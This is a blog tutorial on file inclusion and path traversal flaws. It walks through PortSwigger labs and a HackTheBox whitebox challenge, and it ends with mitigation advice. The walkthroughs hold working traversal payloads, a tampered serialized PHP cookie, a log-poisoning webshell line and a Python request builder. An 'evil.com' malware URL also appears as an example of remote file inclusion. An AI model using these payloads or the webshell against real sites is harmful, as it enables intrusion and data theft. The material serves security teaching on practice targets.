Understanding and Exploiting File Inclusion Vulnerability

mccleod1290

Introduction to File Inclusion Vulnerabilities

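File inclusion vulnerabilities arise when an application loads a file whose path is built from user input without proper validation. An attacker can then make the application read, and sometimes execute, files it was never meant to expose, including malicious files hosted on external servers. This web application attack comes in two flavors: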

Local File Inclusion (LFI) and
Remote File Inclusion (RFI).

Both weaknesses abuse the same flaw, unvalidated user input in file-loading operations, but they behave differently in an attack. Like many weaknesses in the cybersecurity domain, they go by several names. Exploiting them commonly involves path traversal, and the security community often uses that term interchangeably with LFI.

Local File Inclusion (LFI):

In LFI, attackers manipulate file-path parameters to pull sensitive files from the server's filesystem into the application's context. Imagine a librarian mindlessly following a note that says 'go up four shelves and get the locked ledger.' Using path traversal, that is, sequences like ../../../../etc/passwd, attackers navigate the directory structure to reach files such as /etc/passwd, configuration files, or even your application's source code. Weak input validation is the key, and path traversal is how that key gets used to step outside the intended file-access boundaries. The damage? Leaked secrets are only the beginning. With techniques like log poisoning (where attackers inject malicious code into server logs and then include those logs) or abuse of PHP wrappers such as php://filter, an LFI can fairly easily escalate to full code execution. A classic example? The 2007 Joomla LFI exploit, in which attackers combined path traversal with weak validation to leak database logs.

Remote File Inclusion (RFI):

RFI takes it a step further. Rather than searching the local shelves, the librarian now fetches a book from offsite, from somewhere that really doesn't belong: say, a dodgy website hosting nasty PHP malware in its back room. By supplying a fully qualified URL (e.g. http://evil.com/malware.php), attackers trick the application into downloading and executing a remote script over protocols like HTTP or FTP. The result is typically instant: remote code execution, with the server handed to the attackers on a silver platter. RFI rose to fame in the early 2000s through exploits against poorly configured PHP websites where allow_url_fopen and allow_url_include were left enabled (the whole door was wide open).

Now that we know how this vulnerability works, you might be excited to exploit it in the wild. Let's say a website exposes a parameter such as https://example.com?filename=cat.png. You can change the file name to retrieve other files from the server. Note that web content, especially on Linux, is commonly served from /var/www/html, which sits three directories below the root directory (/). If we want a sensitive file like flag.txt, or /etc/passwd, which is the usual proof of concept for this vulnerability, we have to reach it relative to the root directory, three levels above the web root.

In that case we can walk up the directory tree with the ../ sequence. Since we need to move three levels up, ../../../file would work.
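To see why three ../ segments are enough, here is a minimal Python sketch of how such a path resolves. The web root /var/www/html and the helper name resolve are assumptions for illustration; a real application may build its paths differently.

```python
import posixpath

WEB_ROOT = "/var/www/html"  # assumed document root, three levels below /

def resolve(user_supplied: str) -> str:
    """Join the user input onto the web root and collapse any ../ segments."""
    return posixpath.normpath(posixpath.join(WEB_ROOT, user_supplied))

print(resolve("cat.png"))                    # stays inside the web root
print(resolve("../../../etc/passwd"))        # climbs three levels to /
print(resolve("../../../../../etc/passwd"))  # extra ../ cannot go above /
```

Because extra ../ segments cannot climb above the root, adding a few more than strictly needed is harmless when the exact depth is unknown.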

Feel free to solve this PortSwigger lab and try it out for yourself. Simply put, enumerate the application, find the parameter, and use a simple payload like the following to get /etc/passwd:

https://0a2000cc04b90fd6802b9ee300ba00e5.web-security-academy.net/image?filename=../../../etc/passwd

When accessed through the browser, however, the response renders as an empty image.

Looking at the same request in Burp Suite, we do find the contents of /etc/passwd in the response.

We solved the lab only because we already knew the right parameter to fuzz and inject our payloads into. On real websites, how do we find parameters to inject into? That's a valid and intriguing question, right?

How to find parameters to test for file inclusion vulnerability?

Simply put, this blog covers four options. Note that these are not a menu where you pick the one you find attractive and leave. In the real world we may need to try every option, and in the worst case only one, or none, will work. But across CTFs and vulnerable machines, we found that these four methods have stood the test of time and worked in most scenarios.

Option 1 : Manual hunting

As cliché as it sounds, this means clicking every button, submitting every form, exploring every option, taking careful notes on the network requests each endpoint makes, and inspecting each piece of functionality with Burp Suite. When an abnormal or interesting request shows up (spotting these takes intuition that comes with experience), we may have found an endpoint worth testing.

That does not sound fair, right? Does it mean we have to wait 3-7 years until we reach mastery? No. Recon frameworks, asset discovery tools and attack surface management tools can do much of this work for us. Check GitHub for tools like rengine, osmedeus and reconftw. Alternatively, you can read about these automated recon frameworks and how effective they are in this blog.

Option 2: Using ZAP Proxy

This is a highly underrated tool. Its spider and AJAX spider features offer powerful GUI-driven crawling that is accessible with a single right click on the target! All you need to do is click Manual Explore > pick your domain.com > right click it > select AJAX Spider or Spider, and the GUI discovers the web application's endpoints for you in real time.

Another underrated feature is the active scan. It checks for basic attacks and, fortunately for us, a single scan solved our lab.

In the bottom left corner, the Alerts tab lists all the findings, including an alert for path traversal.

So if you are not using ZAP yet, use it in your next pentest or CTF engagement to find low-hanging fruit and discover hidden endpoints.

Option 3: Arjun

This is another popular parameter discovery toolkit, available on GitHub. It installs easily with pipx; search for how to install Python and pip on your operating system, and once that is done you can run the tool. Unfortunately, it could not find any parameters in our case. That's fair: sometimes things work as expected and other times they do not.

Option 4 : Param-miner extension from burp suite

You can install it from the extensions section of Burp Suite; make sure the extension is enabled. We could not find the endpoint using this extension, but a peek at the Logger in Burp Suite revealed an interesting query.

This shows the importance of one of the most overlooked sections in Burp Suite, and it taught us a valuable lesson: do not ignore the Logger.

Option 5 : Your favourite param-discovery toolkits

You might be considering tools like GAU (get all urls) or waybackurls. While these are valid, in CTFs and sometimes in the real world they did not give me results as helpful as the automated frameworks from the first option. Feel free to test all the options before reaching your own conclusion, but for me the first four options have held up and proved useful time and again.
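Whichever tool produces the URL list, the output still has to be triaged for parameters that look like they carry a file name. The Python sketch below is one hypothetical way to do that; the parameter names and extensions in it are our own guesses, not a list taken from any of the tools above.

```python
from urllib.parse import urlsplit, parse_qsl

# Hypothetical heuristics: parameter names that often carry file paths.
SUSPICIOUS_NAMES = {"file", "filename", "path", "page", "include", "template", "doc", "download"}
FILE_EXTENSIONS = (".png", ".jpg", ".php", ".html", ".txt", ".pdf", ".log")

def candidate_params(url: str) -> list[tuple[str, str]]:
    """Return (name, value) pairs whose name or value hints at a file reference."""
    hits = []
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        looks_like_file = "/" in value or value.lower().endswith(FILE_EXTENSIONS)
        if name.lower() in SUSPICIOUS_NAMES or looks_like_file:
            hits.append((name, value))
    return hits

for url in ("https://example.com/image?filename=cat.png&id=7",
            "https://example.com/search?q=shoes"):
    print(url, candidate_params(url))
```

Feeding it the output of a crawler or URL archive tool, one URL per line, gives a short list of parameters worth testing by hand.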

Black box testing

For this approach, you find a valid parameter and fuzz it with wordlists available online (the spray and pray method), though in the long run this is the least effective approach. When you encounter Windows-based servers, use backslashes instead of forward slashes, as in the following payload:

https://insecure-website.com/loadImage?filename=..\..\..\windows\win.ini
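If you would rather generate a small wordlist than download one, a short Python sketch like the following covers both separators at several depths. The function name traversal_payloads and the default depth of six are assumptions chosen for illustration.

```python
def traversal_payloads(target: str, max_depth: int = 6) -> list[str]:
    """Build ../ and ..\\ payloads for a target file at depths 1..max_depth."""
    payloads = []
    for sep in ("/", "\\"):
        # Rewrite the target with the separator used by this payload family.
        normalized = target.strip("/\\").replace("/", sep).replace("\\", sep)
        for depth in range(1, max_depth + 1):
            payloads.append((".." + sep) * depth + normalized)
    return payloads

for payload in traversal_payloads("windows/win.ini", max_depth=3):
    print(payload)
```

Each payload then goes into the parameter under test, for example the filename parameter in the URL above.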

Now that we understand how to find parameters, the real sauce is in choosing and modifying payloads. For that reason we will quickly go through a few labs.

Lab 1: File path traversal, traversal sequences blocked with absolute path bypass

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass

In this lab the server doesn't check whether the requested path is relative or absolute. When we supply an absolute path like /etc/passwd, the server reads the file straight from the root of the filesystem, bypassing the intended restriction to a specific folder (e.g., /var/www/images). This likely works because the server blocks traversal sequences but otherwise trusts the user-supplied path without normalizing it, or maybe because the server itself runs from the root directory. We can only make educated guesses, since we have neither the source code nor any knowledge of how the server is configured. Nonetheless, using an absolute path is a valid bypass to try when testing for file inclusion!

Payload :

image?filename=/etc/passwd

URL to solve this lab:

https://0abd00f003c4b8d780a68f89005800a7.web-security-academy.net/image?filename=/etc/passwd
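We don't have the lab's source code, so the following Python sketch is only a guess at the kind of logic that makes this bypass possible. The folder /var/www/images and the function name naive_image_path are assumptions. It relies on a documented behavior of Python's path joining: when a later component is absolute, the earlier ones are discarded.

```python
import posixpath

IMAGE_DIR = "/var/www/images"  # assumed base folder

def naive_image_path(filename: str) -> str:
    """Block ../ sequences, then join the input onto the image folder."""
    if "../" in filename:
        raise ValueError("traversal sequence blocked")
    # An absolute filename makes join() ignore IMAGE_DIR entirely.
    return posixpath.join(IMAGE_DIR, filename)

print(naive_image_path("21.jpg"))
print(naive_image_path("/etc/passwd"))
```

The filter does its job against ../../../etc/passwd, yet the absolute path contains nothing for it to block.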

Lab 2 : File path traversal, traversal sequences stripped non-recursively

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively

Sometimes the server strips ../ from the input, but only in a single pass. In that case you can nest the sequence: try ....// or ..../\ so that, once the inner ../ is removed, what remains is again a traversal sequence (../ or ..\).

Payload:

....//....//....//etc/passwd

URL to solve this lab:

https://0a4f0056045333198529bcfd00140019.web-security-academy.net/image?filename=....//....//....//etc/passwd
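The difference between stripping once and stripping until nothing is left can be sketched in a few lines of Python. Both function names are our own, and the lab's real filter may be implemented differently.

```python
def strip_once(filename: str) -> str:
    """Remove every ../ found in a single left-to-right pass."""
    return filename.replace("../", "")

def strip_until_stable(filename: str) -> str:
    """Keep removing ../ until the string stops changing."""
    previous = None
    while previous != filename:
        previous = filename
        filename = filename.replace("../", "")
    return filename

payload = "....//....//....//etc/passwd"
print(strip_once(payload))          # the nested sequences collapse back into ../
print(strip_until_stable(payload))  # no traversal sequence survives
```

With the single pass, each ....// loses its inner ../ and the outer characters close up into a fresh ../, which is exactly what the payload counts on.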

Lab 3: File path traversal, traversal sequences stripped with superfluous URL-decode

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode

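Sometimes the server rejects or strips sequences containing characters like /, and URL-encoding the payload, either inside Burp Suite or with CyberChef, bypasses the restriction. In this lab the input is URL-decoded one extra time after the filter runs, so the slash has to be double-encoded: / becomes %2f, and encoding the % again gives %252f. Feel free to combine the techniques learnt in labs 1 and 2 and apply URL encoding to those payloads.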

Payload:

..%252f..%252f..%252fetc/passwd

URL to solve this lab :

https://0a52002e03482067812362170031003e.web-security-academy.net/image?filename=
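Here is a hedged Python sketch of the double-encoding idea. The order of operations in vulnerable_pipeline (decode, filter, decode again) is our assumption about the lab, based only on its title.

```python
from urllib.parse import quote, unquote

def double_encode(payload: str) -> str:
    """URL-encode twice, so / becomes %2F and then %252F."""
    return quote(quote(payload, safe=""), safe="")

def vulnerable_pipeline(raw_value: str) -> str:
    """Assumed flow: normal decode, traversal filter, then one decode too many."""
    decoded_once = unquote(raw_value)           # what the web server does anyway
    filtered = decoded_once.replace("../", "")  # filter sees ..%2f, not ../
    return unquote(filtered)                    # superfluous decode restores ../

print(double_encode("../"))
print(vulnerable_pipeline("..%252f..%252f..%252fetc/passwd"))
print(vulnerable_pipeline("..%2f..%2f..%2fetc/passwd"))
```

Python emits uppercase hex digits (%252F) while the payload above uses lowercase; both decode to the same character. The single-encoded payload is caught because it is already ../ by the time the filter runs.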

Lab 4: File path traversal, validation of start of path

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path

Sometimes the server only checks that the supplied path starts with the expected base folder. Including that base path in the payload (e.g., /var/www/images/../../../etc/passwd) satisfies the check, and the traversal sequences that follow still climb out of the restricted directory to reach sensitive files. Just as a website's HTML is commonly stored in /var/www/html, images can be stored in /var/www/images. Also, when we explore the image location manually by right-clicking and viewing an image, we get the URL https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/21.jpg, which suggests the payload must begin with a valid start path to work.

Payload:

/var/www/images/../../../etc/passwd

URL to solve this lab:

https://0a5700af03e6c4bd8173ed7e009900cb.web-security-academy.net/image?filename=/var/www/images/../../../etc/passwd
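A prefix check of this kind is easy to picture in Python. The sketch below is an assumption about how such validation might look, not the lab's actual code; both function names are ours.

```python
import posixpath

REQUIRED_PREFIX = "/var/www/images"  # base folder seen in the image URL

def passes_prefix_check(filename: str) -> bool:
    """Flawed validation: only looks at how the raw string starts."""
    return filename.startswith(REQUIRED_PREFIX)

def file_actually_opened(filename: str) -> str:
    """What the filesystem resolves once the ../ segments are collapsed."""
    return posixpath.normpath(filename)

payload = "/var/www/images/../../../etc/passwd"
print(passes_prefix_check(payload))   # the check is satisfied
print(file_actually_opened(payload))  # but the file lives outside the folder
```

The check and the filesystem disagree because the check looks at the raw string, while the filesystem resolves the path first.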

Lab 5 : File path traversal, validation of file extension with null byte bypass

Lab URL : https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass

The server might be configured to accept only a valid file extension (e.g., .png). Adding a URL-encoded null byte (%00) after the target file (e.g., ../../../etc/passwd%00.png) lets the payload pass the extension check, while the underlying file API treats the null byte as the end of the string and drops the enforced extension. The traversal therefore succeeds even though the extension check is superficially satisfied.

Payload:

../../../etc/passwd%00.png
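The mismatch between the extension check and the file API can be imitated in Python. The truncation in c_style_path simulates how a C string ends at the first null byte; it is an illustration, not the lab's code.

```python
from urllib.parse import unquote

def passes_extension_check(filename: str) -> bool:
    """Validation that only looks at the end of the full string."""
    return filename.endswith(".png")

def c_style_path(filename: str) -> str:
    """Simulate a C string API: everything after the first null byte is ignored."""
    return filename.split("\x00", 1)[0]

decoded = unquote("../../../etc/passwd%00.png")
print(passes_extension_check(decoded))  # the check sees .png at the end
print(c_style_path(decoded))            # the file API sees ../../../etc/passwd
```

Modern runtimes tend to refuse such paths outright: Python's open() raises ValueError on an embedded null byte, and PHP has rejected null bytes in file paths since 5.3.4, so this trick mostly works against older stacks.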

Whitebox Testing

Lab URL : https://app.hackthebox.com/challenges/Toxic

Pentesting LFI White Box Series: How a Tiny Cookie Crashed the Party
(Understanding the Toxic Challenge’s Vulnerability)

Source Code analysis

The Toxic challenge has two critical flaws:

Blind Trust in Cookies: The website uses a cookie (PHPSESSID) to decide what to show you. But it doesn’t check if the cookie is safe—it just follows orders.
Dangerous File Inclusion: When the website opens files, it doesn’t verify if you’re allowed to see them. Like leaving your house keys under the doormat.

Where’s the vulnerability hiding?

File: index.php (main page code) and PageModel.php (a helper script).

Let’s translate the code into plain English:

The Autoloader (index.php)

spl_autoload_register(function ($name) {  
    if (preg_match('/Models/', $name)) {  
        $name = "models/${name}";  
    }  
    include_once "${name}.php";  
});

When the website needs a tool (like a class), it looks in a toolbox folder (models/) to grab it. The problem is that the toolbox isn't locked: hackers can trick the autoloader into doing something it was never intended to do.

The Cookie Setup

if (empty($_COOKIE['PHPSESSID'])) {  
    $page = new PageModel;  
    $page->file = '/www/index.html';  
    setcookie('PHPSESSID', base64_encode(serialize($page)), ...);  
}

The website gives you a lunchbox (cookie) with a sandwich (index.html) inside. The problem is that you can replace the cookie's contents with anything, including a malicious payload.

The PageModel Class (PageModel.php)

class PageModel {  
    public $file;  
    public function __destruct() {  
        include($this->file);  
    }  
}

This code automatically opens whatever file is stored in $file when the object is destroyed. The problem is that if $file is set to something dangerous (like /var/log/secret.log), the website will still include it, allowing hackers to exploit a local file inclusion vulnerability.

Our main goal is to turn a boring cookie into a remote command center.

Step 1: Create a Poisoned cookie

Tamper with the Cookie: The cookie is a base64-encoded serialized PageModel object. So let’s decode the cookie.

┌─[mccleod1290@parrot]─[~/Desktop]
└──╼ $echo "Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoxNToiL3d3dy9pbmRleC5odG1sIjt9" | base64 -d
O:9:"PageModel":1:{s:4:"file";s:15:"/www/index.html";}

Change the file property from /www/index.html to /var/log/nginx/access.log (the website’s diary).

┌─[dwbruijn@parrot]─[~/Desktop]
└──╼ $echo 'O:9:"PageModel":1:{s:4:"file";s:25:"/var/log/nginx/access.log";}' | base64
Tzo5OiJQYWdlTW9kZWwiOjE6e3M6NDoiZmlsZSI7czoyNToiL3Zhci9sb2cvbmdpbngvYWNjZXNzLmxvZyI7fQo=
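Editing the serialized string by hand is error-prone because the length prefix (s:25) must match the path exactly. A small Python sketch can build the cookie for any path; the helper names are our own, and the format string simply mirrors the decoded cookie shown above.

```python
import base64

def php_serialize_page_model(file_path: str) -> str:
    """Mimic PHP's serialize() output for a PageModel with one public $file."""
    byte_length = len(file_path.encode("utf-8"))  # PHP counts bytes, not characters
    return f'O:9:"PageModel":1:{{s:4:"file";s:{byte_length}:"{file_path}";}}'

def build_cookie(file_path: str) -> str:
    """Base64-encode the serialized object, ready to paste into PHPSESSID."""
    serialized = php_serialize_page_model(file_path)
    return base64.b64encode(serialized.encode("utf-8")).decode("ascii")

print(php_serialize_page_model("/var/log/nginx/access.log"))
print(build_cookie("/var/log/nginx/access.log"))
```

Unlike the echo command above, this does not append a trailing newline, so the encoded value ends slightly differently while carrying the same object.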

Step 2: Write a Secret Message in the Diary

Poison the Logs: Send a request to the website with a malicious User-Agent:

     <?php system($_GET['cmd']); ?>

This writes your PHP code into the log file (like scribbling instructions in the diary).

Step 3: Combine both step 1 & 2

Trigger the Exploit: Reload the page with the poisoned cookie set as PHPSESSID. The website includes the poisoned log file and executes your code.

Now, to get the flag, you can do the following:

Add ?cmd=ls+/ to the URL to list files.
Use ?cmd=cat+/flag.txt to steal the flag!
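Steps 2 and 3 can be scripted as well. The Python sketch below only builds the two requests with the standard library; the base URL is a placeholder you would replace with your challenge instance, and the function names are our own.

```python
import urllib.parse
import urllib.request

WEBSHELL = "<?php system($_GET['cmd']); ?>"  # payload from Step 2

def poison_request(base_url: str) -> urllib.request.Request:
    """Step 2: a request whose User-Agent ends up in the access log."""
    return urllib.request.Request(base_url, headers={"User-Agent": WEBSHELL})

def trigger_request(base_url: str, cookie: str, command: str) -> urllib.request.Request:
    """Step 3: send the tampered cookie plus the command to run."""
    query = urllib.parse.urlencode({"cmd": command})
    url = f"{base_url.rstrip('/')}/?{query}"
    return urllib.request.Request(url, headers={"Cookie": f"PHPSESSID={cookie}"})

# To send them, pass each request to urllib.request.urlopen(), e.g.:
#   urllib.request.urlopen(poison_request("http://<challenge-host>:<port>"))
```

The cookie argument is the base64 string produced in Step 1, and the command is whatever you would otherwise type after ?cmd= in the browser.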

Conclusion

File inclusion vulnerabilities, whether Local (LFI) or Remote (RFI), are a stark reminder of the dangers of misplaced trust. LFI attacks an application in its own habitat, using path traversal to reach important files or gain elevated privileges. RFI, by contrast, turns the application into a puppet that runs malicious code pulled from external domains. Both, nonetheless, have one thing in common: blind faith in poorly sanitized user input.

The fallout is severe. A single unvalidated parameter can lead to data leaks, credential theft and complete system takeover. Attackers move from reading /etc/passwd and users' home directories to planting webshells, poisoning logs, or taking over the underlying infrastructure entirely.

Mitigation isn’t optional—it’s existential:

Strictly enforce allowlists: Only allow access to specific files, directories or URLs. If it's not on the list, it does not exist.
Disable dynamic inclusion: If your app does not need to include files based on user input, turn the feature off. Period.
Normalize and sanitize: Resolve paths to their absolute form, reject traversal sequences (../), and ban dangerous characters and sequences (e.g. %00, ://).
Sandbox file operations: Run inclusion operations as a limited user to keep them away from vital system resources.
Defend in layers: Combine input validation with Web Application Firewalls (WAF) and runtime anomaly monitoring.
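As a rough illustration of the first three points, here is a minimal Python sketch that normalizes the path, confirms it stays inside the base folder, and then consults an allowlist. The base folder, the allowlisted file names and the function name safe_path are all hypothetical.

```python
import posixpath

BASE_DIR = "/var/www/images"            # assumed folder that may be served
ALLOWED_FILES = {"cat.png", "dog.png"}  # hypothetical allowlist

def safe_path(user_input: str) -> str:
    """Return the resolved path, or raise ValueError if the input is not allowed."""
    if "\x00" in user_input:
        raise ValueError("null byte in file name")
    # Normalize first, so the check sees the same path the filesystem would.
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, user_input))
    if posixpath.commonpath([BASE_DIR, candidate]) != BASE_DIR:
        raise ValueError("path escapes the base folder")
    if posixpath.relpath(candidate, BASE_DIR) not in ALLOWED_FILES:
        raise ValueError("file is not on the allowlist")
    return candidate

print(safe_path("cat.png"))
```

On a real server you would also resolve symbolic links (for example with os.path.realpath) before the containment check, since normpath only rewrites the string.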

Understanding LFI and RFI is not transactional, it's transformative. It's not just patching code, it's renewing trust. Each inclusion point is an entry point for attackers. By hardening these vectors you are not just fixing a bug, you are taking out an entire class of exploits. Complacency is the enemy in cybersecurity. Stay curious, stay hungry, and see you on the next blog.